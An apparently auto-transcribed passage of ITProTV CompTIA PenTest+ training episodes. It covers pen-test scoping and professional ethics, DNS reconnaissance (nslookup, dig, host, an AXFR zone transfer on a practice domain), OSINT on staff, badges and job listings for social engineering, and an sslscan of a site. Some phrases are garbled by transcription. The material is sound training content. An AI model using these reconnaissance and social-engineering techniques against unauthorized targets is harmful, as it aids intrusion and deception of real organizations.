A couple things. So we're going to be questioning the client, reviewing contracts, look over things like time management and strategies, and make sure that they are happy with what they're seeing. If you feel like what they're giving you, because a lot of times the client will kind of try to dictate to you, want this done in a week. That's not really, how you say this, useful. We're not going to get enough time to give you something that you can actually use. So maybe get back with them and say, really a 2-week assessment or a 3-week assessment would be better. Maybe you'll have to find a compromise with them. That doesn't happen. And definitely check those strategies, give them good strategies, let them know that that's why you're doing what you're going to do, and test those. And there's also going to be unknowns and known environment testing information that can go in there. If there's something that's, really weird or off in the organization, they need to let you know what that is. We'll give you some information around that, make sure that's in scope and defined so that everybody understands that that's something that's very particular to that specific client. But all that stuff in there, validate that those things are true, put your stamp of approval on it, and a bow on it, and call it a day.
All right, Daniel, that's great information for us to consider, especially if we haven't really been working in the arena of penetration testing. So let's go ahead and review our top points here as we take a look at the idea of scoping. Remember that the whole goal and idea here is to ensure that we're actually hitting exactly what we need to. So we'll also, of course, take a look at the rules of engagement as well as the environmental restrictions that we may have, target list, and also validating scope. This not only helps to ensure that the company understands what it is that we'll be doing, but also helps us to keep our clear focus and to know what it is we should be doing as well. But that's not all that there is, of course. The CompTIA's PenTest Plus, there's plenty more to come, and that means you've got to stay tuned to find out what Daniel's actually going to say next. So make sure you... As we begin That's right, you're doing me, and of course, Mr. Daniel Lowry. I'm going to be talking about professionalism and integrity overall. This reminds me of that beginning scene in Ghostbusters. Suck it up, guys. You're Ghostbusters. And that's what, of course, the professionalism is supposed to be as we come into the nature of working with customers here. So this particular episode is not really about diving into any particular tool or anything like that, but it really is about what we're supposed to be able to represent as a penetration tester. So there's a list of several things that we're going to be going through, and Daniel Lowry, of course, is going to be helping us out here to make sure we understand this a little bit better. So let's go ahead and begin to talk about the first one is PenTest team background checks.
PenTest team background
checks.
Yes, sir. Well, that's going to be fun, right? Because you're like, well, I mean, what's going on here? Are you like applying for some sort of loan or anything like that? Well, background checks are really important because, stick with me, follow the logic here. Let's say you're a pen testing organization, and we've decided we're hiring Ronnie. Ronnie's on our team. He's great. great. We love him. He's really good at his job. Man, he knows pen testing like the back of his hand. We engage with a company and they find out, right, he's got a criminal record. For what? Like, is it screen taking stuff? No, for computer crime. Oops. Yeah. Is that fact? So now our client is sitting there looking at us going, you brought in a criminal that does crime with computers to test our computer systems. You start to see where the trust relationship breaks down at that point in time, right? They no longer will trust that you're going to have integrity. He's already proven himself to not have integrity and professionalism because he engaged in cybercrime. Now, does it happen where ex-hackers become good hackers? It absolutely does. But it's going to be a difficult transition because for a while, you're going to be kind of plutonium. Nobody's going to want to touch you. So you have to build up that trust. And background checks are going to help with the integrity of our organization by letting our clients know that the people that work for us are clean, they have integrity, they've never broken the law, they're not swimming in gambling debts and have all sorts of horrible things. Because the nature of the business is that if somebody with a set of skills that we would have as penetration testers were to turn toward monetary gain in an illicit fashion, they could do that pretty easily, especially with the trust that's given from our clients. They could be pilfering them for all sorts of different information, monies, X, Y, and Z, implanting things for other people if they're not a person of great integrity. So doing background checks is one of the great ways that we can demonstrate to our clients that the people that work for our organization have no issues with that, and that we know for a fact that none of us have those issues. So again, representing our companies, representing ourselves, I'm happy to perform a background check. If you're going to do government work, you're definitely going through this. Right. They are not letting it, and if you've never been through a government questionnaire, it's detailed. You've done that, right? You've had that. It's a lot of fun. They get the rubber glove out. They want to know about your life. They want to know about how you think and feel about certain things and whether or not you have strong leanings that might be a problem for them. So, and a lot of long documents. Very long documents. They're going to talk to your family. They're going to talk to your friends. These background checks get super extensive. So it might not just be a simple, do you have a criminal history? It could go in depth. You need to be able to withstand that kind of scrutiny if you're going to engage in this as a career. And it is important for us that if we start our own companies for doing assessments, that the people that work for us could also withstand that scrutiny. So background checks is a great way to prove the integrity of the penetration tester.
Yeah, I mean, we tend to actually hear about that, right? As a company engages into another company and say, well, who do you have? And you can say, look, all of our employees have gone through background checks. We verified, this and that. That automatically gives an inherent level of trust of saying they already did the job, so we don't have to worry about doing it as well. Now, the next thing on our list, though, here is adhering to the scope of engagement. How does the professional living go ahead?
Yeah, actually, we kind of touched on this a little bit when we discussed the scope in the scope episode. And the fact is, what does the scope do, right? The scope kind of gives us our boundaries, our limitations, what we can, what we cannot do under what circumstances, right? Well, if I don't stick to the script as a pen tester, if I color outside the lines, that is going to prove my unprofessionalism, right? A professional sticks with what was agreed upon and goes to the proper channels for change if change is necessary. If I feel as a tester, if I'm going through a penetration test for a client, I'm in engagement, and I think, oh man, I didn't even realize they had this system, but we don't have access to the scope to go after said system. Maybe it's even actually said this is out of scope, and specifically labeled as an out of scope thing. But you start to see a connection. You need to go through the proper channels to say, if we put this in scope, I feel like you guys have a very bad vulnerability, and I would like to prove that. Can we change the scope documentation? And you go through those steps to make those proper changes, and then you do the thing. You don't do the thing first. And it's not it's better to ask for forgiveness than or better forgiveness than ask for permission. That's not how this works. It's always ask permission first, and then you do the thing. Okay. So if you start coloring outside the lines when it comes to scope, you're going to prove yourself to be an unprofessional pen tester, and you're going to get here's outside the exam, right? Coming close. Let me get you real quick and bend you here for a second. Pen testers and security professionals and the organizations they work with, they talk. And if you get on the list of, yeah, that person knows a lot and they're really skilled, but they're a recluse, they're a loose cannon, you probably don't want to work with them because they're not going to listen, they're not going to play by the rules. They see themselves as a wild gunman or whatever. You're going to get a bad name. You're not going to get work because of your lack of professionalism, right? So that's why this is an important episode for us to discuss these things, to maintain that. You always want to be I want to work with them. They're great. They not only have skills, but they're so easy to work with. They're going to be there for you. They're going to do a great job. That's the reputation you want to have. Not the, yeah, they're really smart. They got all skill in the world. They probably find some 0 days or whatever that nobody else could, but I'd rather take a beating than work with that person. You don't want to be that person. So that's what we're kind of discussing here when it comes to, you can start getting labeled that if you veer from the skills. Okay, so there you go.
Yeah, so our next one here is identify criminal activity. What are we talking about here when we get into this?
Yeah, so identify criminal activity. Let's say you're in pen test, right? You're doing engagement, and you come across something that looks strange. Like, what is this network activity that's going on here? Or what is this person doing in the server? Are they authorized and they've got a USB key and plugging it in? Is that, do you have access to be here? I mean, at the end of the day, penetration testers, although they act as threats, their job is to help secure the system. So if we identify any kind of criminal activity that is happening, we need to report it immediately to our points of contact, right? Let them know, I have discovered some odd things. It looks like you have an insider threat. It looks like you have an APT that's getting access to your system. I'm seeing indications of compromise there. And here's some beaconing that's going on. Whatever that you discover, you need to relay that information to your points of contact immediately. So if you see any kind of criminal activity, it's not just, well, that's not my job, and they'll get to it, I guess. Wrong. We identify that, we let them know, hey, you actually have a breach of some kind or some sort of criminal activity. Even if it's not security related technically, maybe you notice that one of the finance people are embezzling money from the company. All right? Let them know. I'm pretty sure this is what's happening, and then they can start their investigation on that. If you don't do that and they find out that you knew that stuff after the fact, well, remember how you on that list of people that we have to work with? That's another great way to find yourself there. So keep that in mind.
All right, now you also have on this list here limiting the use of tools to a particular engagement. Why should we limit it if we actually have whatever tools that we have on hand to do what we need to do?
Well, yeah, and this also goes to the invasiveness of an engagement as well. So limiting the tool use and limiting the invasiveness of what you're doing with the tools, because again, we're there for our customers. Right? We don't get repeat business by bringing their networks to its knees and rooting every box and making things not work well after we leave. Right? So the idea here is we only do what we need to do to prove that there is a security issue. Right? So if that means gaining access, that's fine, but that doesn't necessarily mean exposing sensitive information. Right? You can prove that you could doing it by, instead of taking production data and exposing it, do something that's innocuous. I'm not going to go as deep as to go to touching production data, but I'm going to touch around production data. I'm not going to invade that deeply. Or maybe I'm not going to use tools that are a bit noisy and can cause havoc with systems. Maybe I'll use a different tool that isn't as noisy and doesn't cause as many problems. It might not be as effective as the other tool may be, but it doesn't cause as many issues as well, or maybe even potentially. Right? And that comes from really a lot of our own experiences and what we've seen and what we've done, and just kind of gauging that. It's very subjective to the testers, and it's going to be through your experience and everything that you guide your customer and saying, hey, I really think we should use this tool. It is a bit noisy. It can cause some system crashes. Do you think you could withstand? Do you have a risk appetite for that level of invasiveness or tool use or the downtime that it could cause? If they say no, you know, okay, we're going to limit ourselves. They can't handle that level of attack, so we're not going to do that. We want to give them what they want because that's what they're paying for. Ultimately, at the end of the day, we work for them. We're trying to give them the product that they're asking for. Now we try to guide them in that based off of our professional experience. But at the end of the day, they have to say so. Once we don't want to give them a bad experience, is what I'm trying to say. And that's what this is really speaking to when it says limit the use of the tool on how it can be done. A lot of times, some of these systems are a little fragile and can break very easily. We don't want to do that. If you know that can happen, then maybe you limit the use of that tool to that system. And use it on other systems, don't use it on that, right? Even if it's an improved tool, and especially the invasiveness, how deep you go. You want to tread very lightly on what you are touching and how that can affect their production overall. Is it going to have a negative effect? It is. You need to really think about that before you engage in activity.
Yeah, another particular aspect that we also want to talk about, of course, is maintaining confidentiality of data that we may come across. What can you actually help us out on here?
Well, I mean, this was really a good segue into this from our last one, right? Because that invasiveness, how deep do I go? Because I might violate confidentiality of my client's information, which I don't want to do. It's kind of the opposite of what we're, right? That's not what we're engaged in doing. I want to keep their confidential information confidential because that's what security professionals do, right? data information might see it that way, but anything that might be sensitive, if you come across it, you're going to find yourself at a crossroads from time to time where something is kind of in that gray area. You're like, is this sensitive and confidential, or isn't it? Really easy things to go, hey, here's where I find myself in my pen test. I'm looking at this document or this system which has sensitive information. If I do the hack, it might expose that. Is that cool or not? Obviously, we use a little more professional verbiage then. Is that cool? But you get the gist. That's the idea. You want to verify that that's not going to cause them a problem or violating confidentialities that we've agreed to, or even if we haven't agreed to it, you know in your heart of hearts that this seems like it's sensitive. It could expose my client. I'm gonna err on the side of caution. It's a good guiding star, and that's what we're talking about here with maintaining that confidentiality.
Yeah, I also see this as part of that integrity piece too. Exactly. The very fact of, let's say that you get through that entire engagement that you're in, but now you have a chance to go and work on something else, and somebody says, oh, what'd you do for them? And all of a sudden you start to reveal stuff that I shouldn't be revealing.
Not a good idea.
Yeah.
Do you remember the NDAs we talked about? Yeah. That's where you're not allowed to do that. Right? You can talk a bit about generic things. You can use loose terminology. Right. I'm glad you brought this up actually because I didn't think about it. It is a very important thing that you are not exposing your client after the fact with loose lips and go, oh yeah,
yeah, so cool here. I did this. Oh,
I was at a conference one time, and the speaker was talking about how they were on a plane and they were testing just randomly. I think it was a web app, right? And they discovered a vulnerability and they were able to basically gain full access into their back systems. And he was like, oh, this is so cool. This has never had I got a CV, and he tweeted about it. He said when I got off the plane, his boss was, let's go this. Let's go. He's a kind of famous guy, and it was like, did you seriously tweet that out before going through responsible disclosure? He was like, oh yeah, yes, that's my bad. And he was like, yeah, that's your bad. And now let's go have a talk and let's go call that person and let them know you did a bad thing. You're very, very sorry. We're gonna give them some free security testing because you had to tweet something out, right? So yes, very good, Ronnie, for bringing that point to the front. I think it is very important for us to remember that it's not just during the test; it's after the test as well. Name no names, stay generic. If you're using examples from your actual experience, it's a good way to keep confidentiality and let your customer know that you have integrity and they'll want to come back to you.
So besides the risk to our own reputation or our company's reputation, what are some of the other risks that we might face if we don't have the professionalism and integrity?
Yeah, because every now and then people make mistakes, right? And no one's perfect. Unfortunately, those things happen. So what are the risks to us as the penetration tester? Great question, and it should be something you always keep in the back of the old mind there, so that you're like, oh, should I know? No, because what can happen? Well, fees and fines, right? A lot of times that's what it ends up being. You made a mistake, you're gonna lose out monetarily in some way, shape, or form, maybe through, hey, we're gonna give this organization some free pen testing because McFly, hello, McFly, what are you thinking? You made a mistake. Oh yeah, I did that. I'm so sorry. And now we're gonna try to make amends in some monetary fashion. And hopefully that can make them whole. And then when it comes to fines, where you actually probably broke a law or some sort of edict by the state, local governments, federal governments maybe, and they're going, well, here are the sanctions we put against you, which is you must pay a fine of $2,000, $10,000, whatever the case is. And depending on the size of your organization or your own pocketbook, that hurt you pretty badly. So we want to steer clear of that, but that's something that could happen. Not only that, the fun part is where you find yourself put up by the state in a lovely facility, right? With
residential
yes, free bed, food, showers, yard time. That'd be good. There's a lot of guys with guns and dogs, making sure you don't try to hop over that razor wire fence they put you behind. But these are the ideas that you have done something criminal enough that you're going to jail, right? You're gonna find criminal charges put against you because you have crossed over some legal boundary that you were not allowed to do, you didn't have authorization to do. So, or you just did because you felt like it.
Yeah.
Right? So if you don't have enough professionalism, you don't have enough integrity to not engage in the things that are going to be very tempting to anybody that has trouble with that, you could find yourself behind the old slamorama, which I hate to see, but if you did the crime, you gotta be willing to do the time, so that can't happen.
Thank you. That's right. Yeah. All right. There's plenty, of course, more to come. But let's take a look at our key points here as we go ahead and wrap this episode up. Remember, professionalism and integrity. We might, of course, engage in the idea of background checks. We have to ensure that we also adhere to the scope. Make sure we also identify the criminal activity, hopefully immediately, of course, to the people that we're also providing the service to. Make sure we also limit our scope and also take a look at invasiveness and confidentiality, and consider, of course, the different risks to the pen tester himself, not only to his organization, but of course, personally as well as we move forward. So that means, of course, that this episode is at an end, but doesn't mean it's the end of the CompTIA pen test series. To actually continue on with us, make sure you click on the very next episode. As we begin with
ITProTV.
Surprise you, we are back. That's right. You're here with Ronnie Wong and, of course, Mr. Daniel Lowry as we get started into the realm of information gathering, kind of the first steps to understanding the stuff that we, of course, have to actually get access to as well. And we're going to start off with DNS, so domain name system here. So hopefully at this point, you already have a foundational understanding of what DNS actually does for you. But now we get to find out from Mr. Daniel Lowry himself, well, Daniel, what does a penetration tester do with the DNS information, and what can we learn from it?
I was really hoping you would know.
Yeah, me too.
No. There are some reasons that we do DNS. Well, one of them, and probably the most foremost, is you give a client, they say, okay, here's our organization, we'll hire you as a penetration tester, your organization has a penetration company to give us an assessment. Sounds great, cool. What do you want us to pen test? And they give you some IPs or domain names. You're like, awesome, those are what I'm going to go after. But here's the thing. I don't know if y'all know this, Ronnie, you might know this as well, but people are imperfect.
What? Yes.
I know. Hard to believe. And they can make mistakes, like giving you wrong IP addresses.
That's true.
Here's another fun fact, is that person does not have the authorization to give you the permission to pen test against systems that they do not own. So we definitely like to use DNS for verification purposes, that the person who says that they own this actually owns this as a part of their actual organization, and we don't make that misstep because that's illegal, right? We don't want to cross those legal boundaries. That's a lot about what would happen if that occurs and what we have to do to come back our way out of that. But ultimately, that's one of the very fundamental reasons we would want to do some DNS recon, just to verify that the system that they've given us is actually owned by them, is part of their network, and we're seeing a parity with that. We're verifying.
Yeah, and that makes more sense now, the verification part, since DNS is actually a global system. That's not maintained by me. I'm not really sending, I guess I could try and send you to my own DNS server, but usually if it's on a global system, and we're actually able to go out there and say, here's the IP address I was given, and we're able to trace that down and actually get to one of the official registrars that has it. Well, that can tell us that, or it doesn't, then we know that we might be a little bit misled at some point, or again, given misinformation, maybe not even intentionally. So where do we begin with this?
Yeah, so where we begin is, well, if you've ever used any kind of DNS system before, you're probably familiar with some of this, like NSLookup. NSLookup is the tried and true tool for doing DNS resolutions. So if you want to take ITProTV and figure out what's the IP address that goes along with that, well, you use NSLookup and perform that function. So if you see what that looks like, so let's see here, it is called NSLookup. And then you just tell it what you want. So on ITPro.tv, because as you know, NSLookup, it translates domain names into IP addresses, because that's really hard for us as people to do. So we automate that. And hey, look at that. I get this non-authoritative answer, which is there's some IPs. Now we see there are multiple IPs that resolve to ITPro.tv. Let me know that there's probably some sort of load balancing happening, or maybe it's going through a CDN network. Something's occurring that it's not just this one-to-one connection, because that's what I should be seeing, because I have one domain. Why do I have multiple IP addresses? Now, this kind of takes us to our next reason why we would want to perform DNS recon, which is I just found 4 hosts that are associated with ITPro.tv. Maybe all they told me was maybe ITPro.tv said, hey, we want you to pen test our organization, and I go to the recon, they say, okay, anything that's ITPro.tv is in scope. Cool. Well, now I have 4 in scope items. I'm going to add to a list, because that's what this is all about. I'm trying to figure out what is available to me from my clients. Especially if I'm doing a black box test, I'm looking from the outside in. What would an attacker be able to see? Well, now they've gleaned that there are 4 systems that are associated in some way with ITPro.tv, which is an in-scope thing. Now, we can have to continue down that rabbit hole, do some verifications, are these third parties, blah, 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 whatever. But at this point, I've got 4 IPs that I want to throw into a file and remember to use as a part of my penetration testing. Maybe those are going to be good systems for me to hack against, find a vulnerability against, and that's what it's all about. Find those systems, and maybe hopefully one of them has a vulnerability, allowing me to gain access, and then we can remediate that down the road.
Yeah. Is there anything else that we might actually choose issues. So I noticed you use DNS lookup, which most often is going to be Windows, but I do now understand that you can use it on Linux, which I did not know as well. And you know that, but there are other ones out there, right?
Yeah, there are some of them, and you might actually prefer other ones like Dig or Host. If you're working in Linux systems, they're usually available. If not, apt-get install or install whatever your package manager is. It's a very common set of tools. So we clear my screen here, have Dig. It's pretty similar, ITPro, right? .tv. Output's going to look just a little bit different, right? Because it's formatted just differently. But ultimately, this answer section is what we're looking at. You'll notice there are the 4 IDs right there, giving me a little more information, letting me know these are A records, right? And I'm forgetting off the top of my head what these 2 other columns are doing, but you can look at man page for this. That's not really super important at this point in time, but just letting you know, just the format of the Dig output is a little bit different. We also have Host. Clear one host ITPro.tv. There we go. And there we go. We get the 4. And it also gives me a little more information. Mail is handled by ITPro-tv.mail.protection.outlook.com. I'm learning more information about my target through DNS. It's telling me that it does have mail, and this is who's handling it. Is that in scope? Well, at least I know they're using Outlook.com. That's interesting. There's definitely some sort of protection going on. Otherwise, it's a weird label for this. But I'm starting to learn more about my target so that I can start to think about how I might want to proceed down the road. Is there something I could utilize through Outlook? At least I know that's what they use. That's the system that's being used. Maybe a social engineering attack could be useful there with that information. So DNS obviously can give us more than what we probably bargained for, honestly.
Yeah. So is there any information that we can learn, like trying to differentiate the host and the not host primary and secondary servers?
Oh, sure, yeah, because you get the default return there. So sometimes you do want to get those primary and secondary. So who are the main flame here when it comes to DNS for this organization? It's pretty simple. You can let me clear here. Let's use host. So I'll use host and use -t for type, and I'll do ns for name servers, and then ITPro.tv. Fire that off, and it's telling me right here. Here are the name servers. One is ns-1 aws-dns.com. Okay, well it does look like we're using a cloud service to provide DNS for us, which is AWS. Again, learning more information about my target as it were, right? So, and this is all freely available information. It's not like we're doing anything crazy, legal bending kind of stuff. This is normal information that gets passed through systems and is allowable for us. But it's all about where can we discover nooks and crannies of information that might be useful to us on the road. Now I know that we're using AWS. I can start to further enumerate this stuff. But there you go. I got the primaries and secondaries for my target.
Yeah, just even looking at what we've done so far, what you've done so far, we were able to find out the IP addresses and be able to validate that. Even found out a little bit about the mail server, and now we found out that our DNS is probably hosted by AWS as well. So getting that kind of started is actually going to be very good as well. Now let's talk about the other aspect, right? So with DNS, we normally are looking up the name and then of course resolving an IP address. But what about the reverse side? What if we only get an IP address?
Yeah, sometimes you'll be hunting around and you might just discover an IP address, or you're giving it to you. They give it to you as, oh, here's an IP. That's good. Right, and you might want to use it. Okay, that's great. That's nice to know. But does that resolve anything? So you can do reverse DNS as well. You just have to look at the different tools on how to do that. I'm trying to remember. Some of them you just give the IP and it goes, oh, you must need a reverse DNS lookup because you have the IP. So it kind of makes that logical assumption that occurs. I wonder if Dig does. I think Dig might do that. So let's do first. Let's host ITPro. I'm horrible today. .tv. Man, that was some brutal typing, ladies and gentlemen. I'm going crazy today. Let me just highlight an IP address here. Copy. And I'll see if Dig does this the way I'm expecting it to. Unless it's just showing me that it has a record, so I might have to go into the tell, hey, I want to do a reverse query. There's usually a flag for that. And these things are typically pretty easy. So I dig -help. Does it have a reverse in here? It's not really saying anything about that. Maybe I need to do a man dig and then search for reverse and see. Okay, there we go. -x option is supplied to indicate reverse lookup. So you go. I need -x and we'd be good. Let me see what that does. Let me put it out here. So I'll clear dig -x. Then throw that in. And there you go. I'm getting the reverse lookup for that right there. So it's interesting. And how that might elicit some interesting results that you weren't expecting. Like here I was expecting to see ITProTV, but actually I'm getting this 123.123.0.54 in yep. Interesting stuff. You can continue down the road and just again, it's all about painting that picture, trying to figure out the underlying infrastructure, how things are connected, and can I find anything interesting with the fact that we're using AWS or that Outlook handling their mail systems. You can change the type to check for mail as well. So if you go to interactive mode, or if I do, let's do this. We'll do dig -tmx, I believe, which is for mail exchange, one of the mail exchange for ITPro.tv. Then you can see there's right there, ITProTV mail protection.outlook.com. So it returned just a mail exchange for that domain. So you can start playing around with this. Definitely dig into the guts of some of these tools because they have some pretty interesting capabilities, but excellent stuff there.
So once we have just the general information that really starts to allow us to see a little bit more and understand a little bit more about the organization and some of the different components that are out there, how can we use this to actually give us a little bit more detail into that network?
Yes, every now and then, when we talk about configuration mistakes, misconfigurations as they typically are referred to as, one of the typical things that you don't want to do as an administrator is allow what's called a zone transfer using DNS. Now, zone transfers are great because if I have a secondary DNS server, I need to be able to do zone transfers to that because what zone transfers is here's all my DNS information. So the primary DNS server will say, I basically have a database full of IPs to domains and the different types of records that they are, and I'm just holding on to that. So when anybody queries me, I take a look, I put things together, I return the results, right? Some of that stuff might not be public knowledge though, right? So if I'm only allowing certain things to go out, that's good. But if I allow for zone transfers, I basically can say, hey, primary DNS server, guess what? I'm a DNS server too, and I need all that database so that I can help you do these things in case you need to go down for some maintenance and got your back. And it goes, oh, okay, here's all the records. And you go, thank you. As an attacker, you can understand that might have some really good information in it. Most people don't engage in that anymore. Right? We understand it's a security issue, that we should not do that, and it's very common for system administrators and network administrators to not allow for full zone transfers. Now, I don't. ITProTV does not allow for full zone transfers. Good news is there's a website out there that is designed so that we can practice on zone transfers. And to do a zone transfer, we can use Dig, we can use host, we can use lookup. I typically like Dig, so that's what I'm going to use for this example. Let me clear the screen here. And what this is going to use is the flag AXFR, and this AXFR says, hey, I want to do that full zone transfer. Right? It does. You got to know how to structure the query real quick. So I'm going to explain this for you. So Dig, and then AXFR, letting the systems know, hey, I want to get that zone transfer. And then the system we're going to actually target here is zonetransfer.me. Again, set up for the purposes of allowing people to practice doing zone transfers and kind of see what that looks like. Get some practical hands-on with this. So then we just have to tell it what name server we're going to use. Now we don't know what that is, so let's do that. Let's look up the name server -dns for zonetransfer.me. It should tell me what that is. There they are, right there. I'm going to grab that. Copy, and then clear, and now we'll do dig AXFR to zonetransfer.me, and then at whatever that name server was with the old enter key, and now we get a full zone transfer. This is the entire database for that name server. It gave me every piece of information, and I can start to see there's this like deadbeef.zonetransfer.me, so I get subdomains, what type of records they are, any interesting information that might be coming back with that. So you can start to see the usefulness of being able to perform a zone transfer for the penetration tester, and why it's a savory bits for any attacker out there that would be coming against your system. So there you go. That's basically what we got for when it comes to DNS and doing the recon with DNS. But if you get lucky from now and then, and you do need to do some of those verifications, you want to find some of those. You don't want to overlook anything. You never know what you'll find.
All right, well, that's a lot of great information. We start gathering information, and maybe DNS is the place that we want to begin by doing that validation that we need. Here, Daniel kind of showed us those different ways to do that. All right, well, that means that there's another great episode coming up soon, so make sure you stay tuned for the very next click. When we take a look at That's right, you're taking a look at two movie fans right here. I am here, of course, with Mr. Daniel Lowry, and we're going to talk about Target Recon. It sounds like a bad
does sound like an 80s action play. I've heard that. That's right. Target Recon 2 is targeting.
So the funny thing is, as I was looking through the notes when we get started, I started looking at all right, so when we talk about Target Recon here, Daniel.
Sorry, Morgan Freeman.
Yeah, that would be good. What actually started making me think, I was like, are we becoming stalkers more than we are actually?
In a certain perspective, one might take it that way, actually. Yeah,
because when we start talking about Target Recon, Daniel, help us out. What are we really going after? But it does sound like stalking to me.
And it kind of is. Just we're not the weird stalking way. We're actually no, it's worse. It's just devolving. We're trying to help. It's for your own good. No. So okay, let's go. What we mean by Target Recon is we have a target, right? We have an organization that's engaged engage with us to do a penetration test, they, in essence, become our targets, right? So we need to start learning what we can learn. If we're doing black box assessments, we're coming from the outside in as true threat emulation in any capacity, then we have to see what we can find as if we were that true actual threat, right? So that's what it's all about. We're just going to try to figure out what is available freely out in the internets that they're actually giving away, but could be used against them in an attack, right? So this is typically what we call passive recon, and this is where we're pulling up things like looking for, I don't know, technical contacts. We want to find out if we can find any administrative contacts. Contacts in general are usually a pretty good thing to go for because people are putting those things out that they want you to contact their company because they want you to engage with whatever service that they offer or product, right? So you're going to find those things. You also can figure out whether or not the cloud hosted or self-hosted, on-prem or wherever, what kind of hosting services are they using. You might run across that kind of information. You can also start looking for the company's reputation. What is their known security stance? Are they good at it? Are they bad at it? Have they had a problem in the past? Or are they known as being, bank vault tights? And you might have your work cut out for you looking for areas that might give you good information. So like I said, it's kind of a passive reconnaissance where we're not running scans that would probe and elicit things, but more scan. If we do any kind of tool, it'll be for trying to gather that information in a more automated way instead of us doing it anyway.
So a lot of stuff that we can do might be found just using a web browser and bringing up the company site, things like that as well.
I like where you're going with that, right?
All right, so this is where I started going, okay, that makes sense, Daniel. But then when the next point that we're about to talk about here, the social media thing that we're talking about, that's where I started saying, we're heading into the stalkerish land, aren't we?
So Ronnie, do me a favor, that should be a roll of tinfoil, okay? Because that makes sense.
I like a big one.
Because if you're not wicked paranoid as a security practitioner, you will be. You will be. Right? Because social media, right? Everybody puts their entire lives on social media. Somebody was saying that the digital world has become the real world. Right? Making that comment. Unfortunately, that doesn't seem to be the case in a lot of ways.
I know what friends of mine that I haven't seen 17 years of having for breakfast sometimes.
Yeah, that's crazy, right? So when we perform, we get into what we call OSINT or open source intelligence gathering. Going after social media is a great place to go because you can just find out so much information. People post their badges. They post, oh, this is the laptop. Here's the swag I just started with this company. Here's a picture of my badge and the laptop they gave me. Okay, so the badge looks like this, and the technology you're using is Mac OS. Blah, blah, blah. Oh, as an attacker, I'm taking notes, right? So social media is great now. I know that your name is now associated with my target, so that's if I start doing things like social engineering attacks, I now can pull in some credibility because I have factual names and people that work for your organization, and I'm saying things that line up with what people in that organization would know to be true. So it gives me credibility when I do things like a social engineering attack. So you start to see the benefit for us as attackers to go into social media. Stop posting things on social media, right? But even if it's not the personnel, it could be the organization. A lot of organizations have their own, presence on social media. I know that we do ITProTV, an ACI learning company. You go on LinkedIn, you're gonna find a profile. You go on YouTube, you're gonna find a channel. You go on we have Instagram, we have TikTok, we have all sorts of stuff. Because we're trying to get out there and let people know about our organization. Not an uncommon thing. I'm an attacker. I'm going to utilize those tools to start to learn about the organization, the people involved, and what it is that they're doing, what they make, and how they do it, so that I can speak with authority and with actual knowledge. Credibility because of that. You can also find things like job listings through. Well, actually, let's go to my computer. I got our ITProTV site up. You must look familiar to you since you're watching me right now. But if I scroll all the way to the bottom here, this is where the stuff typically lies. We got an about page, right? Just again, going back to Ryan's point, just use a web browser, right? We can have teams. We got who's the team, who's the entertainers, like myself and Ronnie. You start to learn personnel, you get names, you get information. I believe some of us have even bios on there. Again, personal information about us. You'll notice that mine doesn't really have bio. Wicked paranoid. So mine does. Yours does. I can learn a little bit about Ronnie. Maybe use that in social engineering. I'm teaching people how to physically target us right now. But going back to the idea of, let's see here, do we have? Oh, look at that. There's careers. Look at careers. We have some job openings. Look at that. Interesting stuff. And we can see people that work here and what their job title is. I wonder if that's useful for us. I think it very well may be. As the attacker says. But as we look through the locations, where's the?
There's a link.
Yeah, where's that link? I know there's a job. I think it's lower. 5 reasons to work here. Let's connect. That's what we're looking for. All right, ISF cookies. Go for it. And then we see that we have some job listings here. One of them is a software engineer. Let's take a look at that position. We are looking for someone who's accepting position for full stack software professionals to join our multidisciplinary team. Oh, look, we're using technologies such as Haskell, Elm, JavaScript, and Terraform. You are learning about the technology stacks that we are using to build our products. That might be useful information, and that's why we look for things like this. And of course, this is on our own website. You go into places like Indeed, Dice, Monsters of the world that have job postings. LinkedIn again, a lot of people post jobs in there. You can learn a lot of information, technical contacts, or who should I be talking to about this job and any more information, right? And we saw a lot of that right here on our own website. Again, we want to get that information out because we need obviously a full stack dev to come work for us, and that's great. But if I were targeting us, I would want to look for that type of information.
Yeah, it's kind of amazing about how much information we really do expose through avenues like social engineering. But even on that webpage that you were showing us, there's other things working in the background on the browser as well. And so one thing we want to talk about, of course, is some of that, such as the cryptographic flaws that might actually be able to be found too.
Absolutely, because most things, and a lot of things other than even browsers, will use encryptions of different types and sundry in different ways. SSH has some encryption, things of that nature. But what types of encryption is it using? Is it using good encryption or is it using weaker encryption? Is there known vulnerabilities? Is this type of encryption? Well, I don't know because I don't know what type of encryption you're using. So you want to start looking for those. Check out those SSL certificates, right? So cryptographic flaws can definitely lead you to like, oh, well, okay, I need to learn what type of cryptographic systems that you're using, and then look for any flaws that might be associated with those things, and start making my list of is this a possible way for me to gain entry or unauthorized access to something, right? So that's what it's all about. Let's see here. When it comes to this, when it comes to SSL certs specifically, there are just some inherent misconfigurations that can happen, or just things that we can do bad administration and cause us problems. This is things like you let the cert expire, you get revoked for some strange reason, XYZ problems occur, and your cert will get revoked, or you need to revoke it, you renew it. It just causes all sorts of issues. It really comes into problems when you're using something like a weak key, or using an SSL version which is older and therefore vulnerable, has vulnerabilities. One of my favorite things is we have this cool SSL scan tool that you can use. Let's open my colleague links box here, and I'll do SSL scan like so, and then I'll just tell ITPro.tv. And it starts to run, and it starts to check, well, okay, what type of SSL are you using? And then it will even check to see if there are any known weaknesses for it, and return that back to me and let me know if it finds any of that information. Now, we see that it wasn't vulnerable to Heartbleed. It is has TSL compression disabled. That's what we've seen from this service port TLS fallback to SCSV. Maybe that's important. But here's really what's interesting is I'm seeing that we support SSL v2, v3, TLS 1.0, 1.1, 1.2, 1.3, and that is interesting stuff. Now I can start looking for weaknesses that might not be something simple like a Heartbleed issue, because it did check that and found that was not vulnerable to that. That's the interesting thing about automation is it might not check for everything. But I do know there is for TLS version 1.2, there's a vulnerability called Raccoon. Difficult to pull off, very, very niche, but it might be something we need to worry about, right? Because we do support that. You think of things like downgrade attacks where, oh, well, you support a weaker version of SSL, therefore I'm going to force us to do that by only supporting that on my end, and therefore now that's the cryptographic scheme that I'm using, and it's much more likely to attack. If I've already got a man in the middle setup, maybe I can start grabbing keys and things of that nature. So you definitely want to look for those cryptographic flaws. It's going to take a lot of time to go through. I'm going to kill it, because ultimately the tool's going to finish, and we're going to take that information and do further reconnaissance.
Now, Daniel, on our list that we have to go through, you also have as a target for our recon data. How does that come into play? Because I'm real kind of fuzzy on it. The other one seems to make sense, but how are we getting more data out?
